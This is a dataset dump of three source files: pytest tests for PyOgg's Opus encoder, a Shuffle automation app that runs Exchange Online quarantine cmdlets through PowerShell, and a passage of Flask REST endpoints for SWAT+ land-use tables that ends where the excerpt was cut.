hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acdf86247a00a3d49fcd61264221b1e97c4c06ef | 2,686 | py | Python | tests/test_opus_buffered_encoder.py | lstolcman/PyOgg | 8be17d09942ee9245527b20eed92ef4795964bd4 | [
"BSD-3-Clause",
"Unlicense"
] | null | null | null | tests/test_opus_buffered_encoder.py | lstolcman/PyOgg | 8be17d09942ee9245527b20eed92ef4795964bd4 | [
"BSD-3-Clause",
"Unlicense"
] | null | null | null | tests/test_opus_buffered_encoder.py | lstolcman/PyOgg | 8be17d09942ee9245527b20eed92ef4795964bd4 | [
"BSD-3-Clause",
"Unlicense"
] | null | null | null | import pytest
import pyogg
import os
os.chdir(os.path.dirname(__file__))
# Function to create an encoder and encode a sample of silence
def init_encoder(samples_per_second=48000,
                 application="audio",
                 channels=1,
                 frame_size=20, #ms
                 duration_ms=60, #ms
                 set_sampling_frequency=True,
                 set_application=True,
                 set_channels=True,
                 set_frame_size=True,
                 callback=None):
    """Build an OpusBufferedEncoder, feed it a buffer of silence, return it.

    The set_* flags let individual configuration steps be skipped so tests
    can exercise the encoder's error handling for missing settings.  When
    *callback* is given, encoding is routed through encode_with_samples.
    """
    enc = pyogg.OpusBufferedEncoder()
    if set_application:
        enc.set_application(application)
    if set_sampling_frequency:
        enc.set_sampling_frequency(samples_per_second)
    if set_channels:
        enc.set_channels(channels)
    if set_frame_size:
        enc.set_frame_size(frame_size)

    # One 16-bit sample per channel per millisecond-slice, for duration_ms.
    bytes_per_sample = 2
    samples_per_ms = samples_per_second // 1000
    silence = b"\x00" * (bytes_per_sample * channels * samples_per_ms * duration_ms)

    if callback is None:
        # Plain encode; the encoded bytes are irrelevant for these tests.
        enc.encode(silence)
    else:
        # Deliver each encoded packet to the supplied callback.
        enc.encode_with_samples(silence, callback=callback)
    return enc
def test_encode():
    """Encoding a buffer of silence with default settings should not raise."""
    init_encoder()
def test_callback():
    """Every packet delivered to the callback must decode to a full frame."""
    frame_size_ms = 10
    samples_per_second = 48000
    channels = 2
    bytes_per_sample = 2

    # A 10 ms frame at 48 kHz carries 480 samples per channel.
    expected_samples = frame_size_ms * samples_per_second // 1000
    # Decoded PCM bytes: samples * 2 bytes per sample * 2 channels.
    expected_pcm_length = expected_samples * bytes_per_sample * channels

    # Decode each packet to prove the encoder emitted valid Opus data.
    decoder = pyogg.OpusDecoder()
    decoder.set_sampling_frequency(samples_per_second)
    decoder.set_channels(channels)

    def on_packet(encoded_packet, samples):
        assert len(encoded_packet) > 0
        assert samples == expected_samples
        # Check encoded packet is valid by round-tripping it.
        pcm = decoder.decode(encoded_packet)
        assert len(pcm) == expected_pcm_length

    # Create the encoder; encoding happens inside init_encoder.
    init_encoder(
        channels=channels,
        frame_size=frame_size_ms,
        callback=on_packet,
    )
def test_invalid_frame_size():
    """Opus supports only specific frame sizes; 15 ms must be rejected."""
    with pytest.raises(pyogg.PyOggError):
        init_encoder(frame_size=15)
def test_frame_size_not_set():
    """Encoding without ever configuring a frame size must raise."""
    with pytest.raises(pyogg.PyOggError):
        init_encoder(set_frame_size=False)
| 26.86 | 65 | 0.633656 |
acdf86483b280d74784e62848f50e9478fa73ba7 | 5,915 | py | Python | exchange-powershell/1.0.0/src/app.py | frikky/shuffle-apps | 4538370c477e6de6acdb382a672e07bcfe858b18 | [
"MIT"
] | 13 | 2021-12-04T19:37:34.000Z | 2022-03-25T16:17:29.000Z | exchange-powershell/1.0.0/src/app.py | frikky/shuffle-apps | 4538370c477e6de6acdb382a672e07bcfe858b18 | [
"MIT"
] | 85 | 2021-11-17T09:44:56.000Z | 2022-03-28T08:40:00.000Z | exchange-powershell/1.0.0/src/app.py | frikky/shuffle-apps | 4538370c477e6de6acdb382a672e07bcfe858b18 | [
"MIT"
] | 10 | 2021-11-29T12:24:45.000Z | 2022-03-31T13:30:01.000Z | import socket
import asyncio
import time
import random
import json
import subprocess
import base64
from walkoff_app_sdk.app_base import AppBase
# 1. Generate the api.yaml based on downloaded files
# 2. Add a way to choose the rule and the target platform for it
# 3. Add the possibility of translating rules back and forth
# 4. Make it so you can start with Mitre Att&ck techniques
# and automatically get the right rules set up with your tools :O
class exchange_powershell(AppBase):
    """Shuffle app driving Exchange Online quarantine cmdlets via pwsh.

    Each action renders the PowerShell template ``replacementfile.ps1``
    (containing {USERNAME}/{PASSWORD}/{COMMAND} placeholders), executes it
    with ``pwsh``, and returns the cleaned stdout (or stderr on failure).
    """

    __version__ = "1.0.0"
    app_name = "exchange-powershell"

    def __init__(self, redis, logger, console_logger=None):
        """
        Each app should have this __init__ to set up Redis and logging.
        :param redis:
        :param logger:
        :param console_logger:
        """
        # Path to the PowerShell template. It is only ever read, never
        # modified (see replace_and_run).
        self.filename = "replacementfile.ps1"
        super().__init__(redis, logger, console_logger)

    def cleanup(self, item):
        """Strip leading non-JSON noise from pwsh output.

        Keeps everything from the first line starting with '{' or '['
        onwards; returns *item* unchanged when no such line exists.
        """
        newlines = []
        print(f"Cleanup item: {item}")
        record = False
        skipped = 0
        for line in item.split("\n"):
            if line.startswith("{") or line.startswith("["):
                record = True
            if not record and not line.startswith("{") and not line.startswith("["):
                skipped += 1
            if record:
                newlines.append(line)

        print(f"SKIPPED {skipped} lines")
        if len(newlines) == 0:
            return item

        return "\n".join(newlines)

    def replace_and_run(self, username, password, parsed_command):
        """Render the script template with credentials/command and run it.

        Returns the (JSON-cleaned) stdout of the script, or stderr when
        the script produced no stdout.
        """
        # Local imports: only this method needs them.
        import os
        import tempfile

        with open(self.filename, "r") as tmp:
            data = tmp.read()
        if len(data) == 0:
            return ""

        data = data.replace("{USERNAME}", username)
        data = data.replace("{PASSWORD}", password)
        data = data.replace("{COMMAND}", parsed_command)
        # Security: do NOT print the rendered script - it contains the
        # account credentials. Log only the command being executed.
        print(f"COMMAND TO RUN: {parsed_command}")

        # BUGFIX: the original wrote the rendered script back over the
        # template file, destroying the placeholders and making every
        # subsequent call re-run the first call's command/credentials.
        # Render into a throwaway file instead and leave the template alone.
        fd, script_path = tempfile.mkstemp(suffix=".ps1")
        try:
            with os.fdopen(fd, "w") as tmp:
                tmp.write(data)

            command = f"pwsh -file {script_path}"
            print(f"PRE POPEN: {command}")
            process = subprocess.Popen(
                command,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                text=True,
                shell=True,  # nosec
            )
            print("POST STDOUT")
            stdout = process.communicate()
            print(f"STDOUT: {stdout}")
        finally:
            # Always remove the rendered script so credentials don't linger
            # on disk.
            try:
                os.remove(script_path)
            except OSError:
                pass

        if len(stdout[0]) > 0:
            item = stdout[0]
            print("Succesfully ran bash. Stdout: %s" % item)
        else:
            item = stdout[1]
            print("FAILED to run bash. Stdout: %s!" % item)

        # Best effort: trim any banner noise before the JSON payload.
        try:
            new_cleanup = self.cleanup(item)
            if len(new_cleanup) > 0:
                item = new_cleanup
        except Exception:
            pass

        # Popen(text=True) already yields str, so no decode step is needed
        # (the original's item.decode("utf-8") always raised and was
        # silently swallowed).
        return item

    def release_quarantine_message(self, username, password, message_id):
        """Release a quarantined message back to its recipients."""
        parsed_command = f"Release-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
        return self.replace_and_run(username, password, parsed_command)

    def preview_quarantine_message(self, username, password, message_id):
        """Preview a quarantined message."""
        parsed_command = f"Preview-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
        return self.replace_and_run(username, password, parsed_command)

    def export_quarantine_message(self, username, password, message_id, skip_upload="false"):
        """Export a quarantined message as .eml and upload it to Shuffle.

        With skip_upload="true" the raw base64 eml content is returned
        instead of a Shuffle file id.
        """
        parsed_command = f"Export-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
        ret = self.replace_and_run(username, password, parsed_command)
        print("RET: %s" % ret)

        try:
            ret = json.loads(ret)
        except json.decoder.JSONDecodeError:
            # Not JSON - pass the raw output through so the caller can see
            # the underlying PowerShell error.
            return ret

        file_eml = ret["Eml"]
        if skip_upload == "true":
            return file_eml

        message_bytes = base64.b64decode(file_eml)
        fileinfo = self.set_files({
            "filename": f"{message_id}.eml",
            "data": message_bytes
        })
        if len(fileinfo) == 1:
            return {
                "success": True,
                "file_id": fileinfo[0]
            }
        return fileinfo

    def delete_quarantine_message(self, username, password, message_id):
        """Delete a quarantined message."""
        parsed_command = f"Delete-QuarantineMessage -Identity {message_id} | ConvertTo-Json"
        return self.replace_and_run(username, password, parsed_command)

    def get_quarantine_message(self, username, password, message_id):
        """Fetch details of one quarantined message."""
        parsed_command = f"Get-QuarantineMessage {message_id} | ConvertTo-Json"
        return self.replace_and_run(username, password, parsed_command)

    def get_quarantine_messages(self, username, password, time_from, time_to):
        """List quarantined messages (first page of 50).

        NOTE(review): time_from/time_to are currently unused - the original
        date-filtered command is kept below for reference.
        """
        #parsed_command = f"Get-QuarantineMessage -StartReceivedDate {time_from} -EndReceivedDate {time_to} | ConvertTo-Json"
        #parsed_command = f"Get-QuarantineMessage -StartReceivedDate {time_from} -EndReceivedDate {time_to}"
        parsed_command = f"Get-QuarantineMessage -PageSize 50 -Page 1"
        return self.replace_and_run(username, password, parsed_command)

    def get_quarantine_messageheaders(self, username, password, message_id):
        """Fetch the headers of one quarantined message."""
        parsed_command = f"Get-QuarantineMessageHeader {message_id} | ConvertTo-Json"
        return self.replace_and_run(username, password, parsed_command)
# SDK entry point: lets the Shuffle app runner start this app directly.
if __name__ == "__main__":
    exchange_powershell.run()
| 32.322404 | 125 | 0.615892 |
acdf87c0a73ffc1bdb30ca30bc06f1dcb3063474 | 19,887 | py | Python | editor_api/rest/lum.py | jphuart/swatplus-automatic-workflow | dd2eeb7f882eb2d4ab7e1e5265c10b9beb93ddc4 | [
"MIT"
] | 8 | 2020-06-28T07:50:29.000Z | 2022-01-05T16:29:48.000Z | editor_api/rest/lum.py | jphuart/swatplus-automatic-workflow | dd2eeb7f882eb2d4ab7e1e5265c10b9beb93ddc4 | [
"MIT"
] | null | null | null | editor_api/rest/lum.py | jphuart/swatplus-automatic-workflow | dd2eeb7f882eb2d4ab7e1e5265c10b9beb93ddc4 | [
"MIT"
] | 5 | 2020-06-28T07:50:31.000Z | 2021-08-16T07:09:59.000Z | from flask_restful import Resource, reqparse, abort
from playhouse.shortcuts import model_to_dict
from peewee import *
from .base import BaseRestModel
from database.project import base
from database.project.setup import SetupProjectDatabase
from database.project.lum import Landuse_lum, Management_sch, Cntable_lum, Cons_prac_lum, Ovn_table_lum, Management_sch_auto, Management_sch_op
from database.project.structural import Tiledrain_str, Septic_str, Filterstrip_str, Grassedww_str, Bmpuser_str
from database.project.hru_parm_db import Urban_urb
from database.project.init import Plant_ini
from database.project.decision_table import D_table_dtl
from database.datasets.setup import SetupDatasetsDatabase
from database.datasets import lum as ds_lum
from database import lib
from helpers import utils
invalid_name_msg = 'Invalid name {name}. Please ensure the value exists in your database.'
def get_landuse_args(get_selected_ids=False):
    """Parse the JSON body for land use endpoints.

    When *get_selected_ids* is True an integer list 'selected_ids' is
    expected (bulk edit); otherwise a single optional 'id' is accepted.
    """
    parser = reqparse.RequestParser()
    if get_selected_ids:
        parser.add_argument('selected_ids', type=int, action='append', required=False, location='json')
    else:
        parser.add_argument('id', type=int, required=False, location='json')
    parser.add_argument('name', type=str, required=True, location='json')

    # Remaining fields are optional strings; the *_name fields are resolved
    # to foreign-key ids later by save_landuse_args.
    optional_fields = (
        'description', 'cal_group', 'urb_ro', 'plnt_com_name', 'mgt_name',
        'cn2_name', 'cons_prac_name', 'urban_name', 'ov_mann_name',
        'tile_name', 'sep_name', 'vfs_name', 'grww_name', 'bmp_name',
    )
    for field in optional_fields:
        parser.add_argument(field, type=str, required=False, location='json')

    return parser.parse_args(strict=True)
def save_landuse_args(self, m, args):
    """Copy parsed request args onto a Landuse_lum row and save it.

    Name-valued lookup fields are translated to foreign-key ids; a
    DoesNotExist raised by any lookup propagates to the caller.
    """
    m.name = args['name']
    m.description = args['description']
    m.cal_group = utils.remove_space(args['cal_group'])
    m.urb_ro = args['urb_ro']

    # (row attribute, lookup table, request arg holding the name)
    lookups = (
        ('plnt_com_id', Plant_ini, 'plnt_com_name'),
        ('mgt_id', Management_sch, 'mgt_name'),
        ('cn2_id', Cntable_lum, 'cn2_name'),
        ('cons_prac_id', Cons_prac_lum, 'cons_prac_name'),
        ('urban_id', Urban_urb, 'urban_name'),
        ('ov_mann_id', Ovn_table_lum, 'ov_mann_name'),
        ('tile_id', Tiledrain_str, 'tile_name'),
        ('sep_id', Septic_str, 'sep_name'),
        ('vfs_id', Filterstrip_str, 'vfs_name'),
        ('grww_id', Grassedww_str, 'grww_name'),
        ('bmp_id', Bmpuser_str, 'bmp_name'),
    )
    for attr, table, arg_name in lookups:
        setattr(m, attr, self.get_id_from_name(table, args[arg_name]))

    return m.save()
class LanduseLumListApi(BaseRestModel):
    """Paged listing endpoint for land use (landuse.lum) rows."""
    def get(self, project_db, sort, reverse, page, items_per_page):
        """Return one page of land use rows, including back references."""
        return self.base_paged_list(project_db, sort, reverse, page, items_per_page, Landuse_lum, 'landuse', True)
class LanduseLumApi(BaseRestModel):
    # Single-row endpoint for land use (landuse.lum) properties.
    def get(self, project_db, id):
        """Return one land use row (with back references)."""
        return self.base_get(project_db, id, Landuse_lum, 'Landuse', True)
    def delete(self, project_db, id):
        """Delete one land use row."""
        return self.base_delete(project_db, id, Landuse_lum, 'Landuse')
    def put(self, project_db, id):
        """Update one land use row from the request body.

        A missing land use row aborts with 404; a duplicate name or a
        lookup name that cannot be resolved aborts with 400.
        """
        args = get_landuse_args()
        try:
            SetupProjectDatabase.init(project_db)
            m = Landuse_lum.get(Landuse_lum.id == id)
            result = save_landuse_args(self, m, args)
            if result > 0:
                return 200
            abort(400, message='Unable to update land use properties {id}.'.format(id=id))
        except IntegrityError as e:
            abort(400, message='Land use name must be unique.')
        except Landuse_lum.DoesNotExist:
            abort(404, message='Land use properties {id} does not exist'.format(id=id))
        # Each lookup table has its own handler so the error message can
        # name the exact request value that failed to resolve.
        except Plant_ini.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['plnt_com_name']))
        except Management_sch.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['mgt_name']))
        except Cntable_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['cn2_name']))
        except Cons_prac_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['cons_prac_name']))
        except Urban_urb.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['urban_name']))
        except Ovn_table_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['ov_mann_name']))
        except Tiledrain_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['tile_name']))
        except Septic_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['sep_name']))
        except Filterstrip_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['vfs_name']))
        except Grassedww_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['grww_name']))
        except Bmpuser_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['bmp_name']))
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
class LanduseLumPostApi(BaseRestModel):
    """Creation endpoint for land use (landuse.lum) rows."""
    def post(self, project_db):
        """Create a land use row from the request body.

        Returns 200 on success; aborts with 400 on a duplicate name or
        when any lookup name cannot be resolved.
        """
        args = get_landuse_args()
        try:
            SetupProjectDatabase.init(project_db)
            m = Landuse_lum()
            result = save_landuse_args(self, m, args)
            if result > 0:
                return 200
            # Fixed copy-paste: this endpoint creates land use rows (not
            # channel properties) and has no row id to report - the old
            # message formatted the builtin `id` function into the text.
            abort(400, message='Unable to create land use properties.')
        except IntegrityError:
            abort(400, message='Land use name must be unique.')
        except Plant_ini.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['plnt_com_name']))
        except Management_sch.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['mgt_name']))
        except Cntable_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['cn2_name']))
        except Cons_prac_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['cons_prac_name']))
        except Urban_urb.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['urban_name']))
        except Ovn_table_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['ov_mann_name']))
        except Tiledrain_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['tile_name']))
        except Septic_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['sep_name']))
        except Filterstrip_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['vfs_name']))
        except Grassedww_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['grww_name']))
        except Bmpuser_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['bmp_name']))
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
class LanduseLumUpdateManyApi(BaseRestModel):
    """Bulk-edit endpoint for land use (landuse.lum) rows."""
    def get(self, project_db):
        """Return the id/name list used to select rows for bulk editing."""
        return self.base_name_id_list(project_db, Landuse_lum)

    def put(self, project_db):
        """Apply every supplied field to all selected land use rows.

        Only fields present (non-null) in the request are updated; name
        fields are resolved to foreign-key ids first.
        """
        SetupProjectDatabase.init(project_db)
        args = get_landuse_args(True)
        try:
            param_dict = {}
            if args['cal_group'] is not None:
                param_dict['cal_group'] = utils.remove_space(args['cal_group'])
            if args['urb_ro'] is not None:
                param_dict['urb_ro'] = args['urb_ro']

            # (request arg holding the name, column to set, lookup table)
            lookups = (
                ('plnt_com_name', 'plnt_com_id', Plant_ini),
                ('mgt_name', 'mgt_id', Management_sch),
                ('cn2_name', 'cn2_id', Cntable_lum),
                ('cons_prac_name', 'cons_prac_id', Cons_prac_lum),
                ('urban_name', 'urban_id', Urban_urb),
                ('ov_mann_name', 'ov_mann_id', Ovn_table_lum),
                ('tile_name', 'tile_id', Tiledrain_str),
                ('sep_name', 'sep_id', Septic_str),
                ('vfs_name', 'vfs_id', Filterstrip_str),
                ('grww_name', 'grww_id', Grassedww_str),
                ('bmp_name', 'bmp_id', Bmpuser_str),
            )
            for arg_name, column, table in lookups:
                if args[arg_name] is not None:
                    param_dict[column] = self.get_id_from_name(table, args[arg_name])

            query = Landuse_lum.update(param_dict).where(Landuse_lum.id.in_(args['selected_ids']))
            result = query.execute()
            if result > 0:
                return 200
            # Fixed copy-paste: this endpoint edits land use rows, not
            # channel properties.
            abort(400, message='Unable to update land use properties.')
        except Plant_ini.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['plnt_com_name']))
        except Management_sch.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['mgt_name']))
        except Cntable_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['cn2_name']))
        except Cons_prac_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['cons_prac_name']))
        except Urban_urb.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['urban_name']))
        except Ovn_table_lum.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['ov_mann_name']))
        except Tiledrain_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['tile_name']))
        except Septic_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['sep_name']))
        except Filterstrip_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['vfs_name']))
        except Grassedww_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['grww_name']))
        except Bmpuser_str.DoesNotExist:
            abort(400, message=invalid_name_msg.format(name=args['bmp_name']))
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
def save_cntable_lum(m, args):
    """Copy parsed request args onto a Cntable_lum row and save it.

    Free-text fields have spaces stripped via utils.remove_space.
    """
    m.name = args['name']
    for text_field in ('description', 'treat', 'cond_cov'):
        setattr(m, text_field, utils.remove_space(args[text_field]))
    for cn_field in ('cn_a', 'cn_b', 'cn_c', 'cn_d'):
        setattr(m, cn_field, args[cn_field])
    return m.save()
class CntableLumListApi(BaseRestModel):
    """Paged listing endpoint for curve number (cntable.lum) rows."""
    def get(self, project_db, sort, reverse, page, items_per_page):
        """Return one page of curve number table rows."""
        return self.base_paged_list(project_db, sort, reverse, page, items_per_page, Cntable_lum, 'cntable')
class CntableLumApi(BaseRestModel):
    # Single-row endpoint for curve number (cntable.lum) tables.
    def get(self, project_db, id):
        """Return one curve number table row."""
        return self.base_get(project_db, id, Cntable_lum, 'Curve Number')
    def delete(self, project_db, id):
        """Delete one curve number table row."""
        return self.base_delete(project_db, id, Cntable_lum, 'Curve Number')
    def put(self, project_db, id):
        """Update one curve number table row from the request body."""
        try:
            SetupProjectDatabase.init(project_db)
            args = self.get_args('cntable_lum', project_db)
            m = Cntable_lum.get(Cntable_lum.id == id)
            result = save_cntable_lum(m, args)
            if result > 0:
                return 200
            abort(400, message='Unable to update curve number table {id}.'.format(id=id))
        except IntegrityError as e:
            abort(400, message='Curve number table name must be unique.')
        except Cntable_lum.DoesNotExist:
            abort(404, message='Curve number table {id} does not exist'.format(id=id))
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
class CntableLumUpdateManyApi(BaseRestModel):
    """Bulk-edit endpoint for curve number tables."""
    def get(self, project_db):
        """Return the id/name list used to select rows for bulk editing."""
        return self.base_name_id_list(project_db, Cntable_lum)

    def put(self, project_db):
        """Apply every supplied (non-null) field to all selected rows."""
        try:
            SetupProjectDatabase.init(project_db)
            args = self.get_args('cntable_lum', project_db, True)

            # Free-text fields get their spaces stripped; fields left as
            # None in the request are simply not updated.
            remove_spaces = ('description', 'treat', 'cond_cov')
            param_dict = {
                key: (utils.remove_space(args[key]) if key in remove_spaces else args[key])
                for key in args.keys()
                if args[key] is not None and key != 'selected_ids'
            }

            query = Cntable_lum.update(param_dict).where(Cntable_lum.id.in_(args['selected_ids']))
            if query.execute() > 0:
                return 200
            abort(400, message='Unable to update curve number tables.')
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
class CntableLumPostApi(BaseRestModel):
    """Creation endpoint for curve number (cntable.lum) rows."""
    def post(self, project_db):
        """Create a curve number table row; return it with 201 on success."""
        try:
            SetupProjectDatabase.init(project_db)
            args = self.get_args('cntable_lum', project_db)
            m = Cntable_lum()
            result = save_cntable_lum(m, args)
            if result > 0:
                return model_to_dict(m), 201
            # Fixed: the old message formatted the builtin `id` function
            # into the text ("...<built-in function id>") because this
            # endpoint has no row id yet.
            abort(400, message='Unable to create curve number table.')
        except IntegrityError:
            abort(400, message='Curve number table name must be unique.')
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
class CntableLumDatasetsApi(BaseRestModel):
    # Read-only lookup of a curve number table from the datasets database.
    def get(self, datasets_db, name):
        """Return the dataset curve number table matching *name*."""
        return self.base_get_datasets_name(datasets_db, name, ds_lum.Cntable_lum, 'Curve number table')
class OvntableLumListApi(BaseRestModel):
    """Paged listing endpoint for overland Mannings n (ovn_table.lum) rows."""
    def get(self, project_db, sort, reverse, page, items_per_page):
        """Return one page of Mannings n table rows."""
        return self.base_paged_list(project_db, sort, reverse, page, items_per_page, Ovn_table_lum, 'ovntable')
class OvntableLumApi(BaseRestModel):
    # Single-row endpoint for overland Mannings n tables.
    def get(self, project_db, id):
        """Return one Mannings n row."""
        return self.base_get(project_db, id, Ovn_table_lum, 'Mannings n')
    def delete(self, project_db, id):
        """Delete one Mannings n row."""
        return self.base_delete(project_db, id, Ovn_table_lum, 'Mannings n')
    def put(self, project_db, id):
        """Update one Mannings n row from the request body."""
        return self.base_put(project_db, id, Ovn_table_lum, 'Mannings n')
class OvntableLumUpdateManyApi(BaseRestModel):
    # Bulk-edit endpoint for overland Mannings n tables.
    def get(self, project_db):
        """Return the id/name list used to select rows for bulk editing."""
        return self.base_name_id_list(project_db, Ovn_table_lum)
    def put(self, project_db):
        """Apply the supplied fields to all selected Mannings n rows."""
        return self.base_put_many(project_db, Ovn_table_lum, 'Mannings n')
class OvntableLumPostApi(BaseRestModel):
    # Creation endpoint for overland Mannings n tables.
    def post(self, project_db):
        """Create a Mannings n row from the request body."""
        return self.base_post(project_db, Ovn_table_lum, 'Mannings n')
class OvntableLumDatasetsApi(BaseRestModel):
    # Read-only lookup of a Mannings n table from the datasets database.
    def get(self, datasets_db, name):
        """Return the dataset Mannings n table matching *name*."""
        return self.base_get_datasets_name(datasets_db, name, ds_lum.Ovn_table_lum, 'Mannings n table')
class ConsPracLumListApi(BaseRestModel):
    """Paged listing endpoint for conservation practice (cons_prac.lum) rows."""
    def get(self, project_db, sort, reverse, page, items_per_page):
        """Return one page of conservation practice rows."""
        return self.base_paged_list(project_db, sort, reverse, page, items_per_page, Cons_prac_lum, 'cons_prac')
class ConsPracLumApi(BaseRestModel):
    # Single-row endpoint for conservation practices.
    def get(self, project_db, id):
        """Return one conservation practice row."""
        return self.base_get(project_db, id, Cons_prac_lum, 'Conservation practice')
    def delete(self, project_db, id):
        """Delete one conservation practice row."""
        return self.base_delete(project_db, id, Cons_prac_lum, 'Conservation practice')
    def put(self, project_db, id):
        """Update one conservation practice row from the request body."""
        return self.base_put(project_db, id, Cons_prac_lum, 'Conservation practice')
class ConsPracLumUpdateManyApi(BaseRestModel):
    # Bulk-edit endpoint for conservation practices.
    def get(self, project_db):
        """Return the id/name list used to select rows for bulk editing."""
        return self.base_name_id_list(project_db, Cons_prac_lum)
    def put(self, project_db):
        """Apply the supplied fields to all selected practice rows."""
        return self.base_put_many(project_db, Cons_prac_lum, 'Conservation practice')
class ConsPracLumPostApi(BaseRestModel):
    # Creation endpoint for conservation practices.
    def post(self, project_db):
        """Create a conservation practice row from the request body."""
        return self.base_post(project_db, Cons_prac_lum, 'Conservation practice')
class ConsPracLumDatasetsApi(BaseRestModel):
    # Read-only lookup of a conservation practice from the datasets database.
    def get(self, datasets_db, name):
        """Return the dataset conservation practice matching *name*."""
        return self.base_get_datasets_name(datasets_db, name, ds_lum.Cons_prac_lum, 'Conservation practices')
def get_mgt_args():
    """Parse the JSON body for management schedule endpoints."""
    parser = reqparse.RequestParser()
    parser.add_argument('id', type=int, required=False, location='json')
    parser.add_argument('name', type=str, required=True, location='json')
    # Child collections arrive as raw lists; their contents are validated
    # when the schedule's rows are rebuilt.
    for list_arg in ('auto_ops', 'operations'):
        parser.add_argument(list_arg, type=list, required=False, location='json')
    return parser.parse_args(strict=True)
class ManagementSchListApi(BaseRestModel):
    """Paged listing endpoint for management schedules."""
    def get(self, project_db, sort, reverse, page, items_per_page):
        """Return one page of schedules with operation/auto-op counts."""
        SetupProjectDatabase.init(project_db)
        total = Management_sch.select().count()

        # Peewee needs an explicit descending SQL fragment for reverse order.
        order = SQL(sort).desc() if reverse == 'true' else SQL(sort)
        rows = Management_sch.select().order_by(order).paginate(int(page), int(items_per_page))

        items = [{
            'id': row.id,
            'name': row.name,
            'num_ops': len(row.operations),
            'num_auto': len(row.auto_ops),
        } for row in rows]
        return {'total': total, 'mgt_sch': items}
class ManagementSchApi(BaseRestModel):
    """Single management schedule endpoint (get/delete/put)."""
    def get(self, project_db, id):
        """Return one schedule with its operations and auto-operations."""
        return self.base_get(project_db, id, Management_sch, 'Management schedule', back_refs=True, max_depth=2)

    def delete(self, project_db, id):
        """Delete one schedule."""
        return self.base_delete(project_db, id, Management_sch, 'Management schedule')

    def put(self, project_db, id):
        """Replace a schedule's name, auto-operations and operations.

        Existing child rows are deleted and re-inserted from the request
        body.
        """
        try:
            SetupProjectDatabase.init(project_db)
            args = get_mgt_args()
            m = Management_sch.get(Management_sch.id == id)
            m.name = args['name']
            m.save()

            # Resolve each named decision table in lum.dtl to its id.
            new_auto = []
            for a in args['auto_ops']:
                try:
                    dt = D_table_dtl.get((D_table_dtl.file_name == 'lum.dtl') & (D_table_dtl.name == a))
                    new_auto.append({'management_sch_id': m.id, 'd_table_id': dt.id})
                except D_table_dtl.DoesNotExist:
                    abort(404, message='Decision table {name} does not exist'.format(name=a))

            # Operation order comes straight from the client payload
            # (the original kept a dead local counter here; removed).
            new_ops = [{
                'management_sch_id': m.id,
                'op_typ': o['op_typ'],
                'mon': o['mon'],
                'day': o['day'],
                'op_data1': o['op_data1'],
                'op_data2': o['op_data2'],
                'op_data3': o['op_data3'],
                'order': o['order'],
                'hu_sch': o['hu_sch']
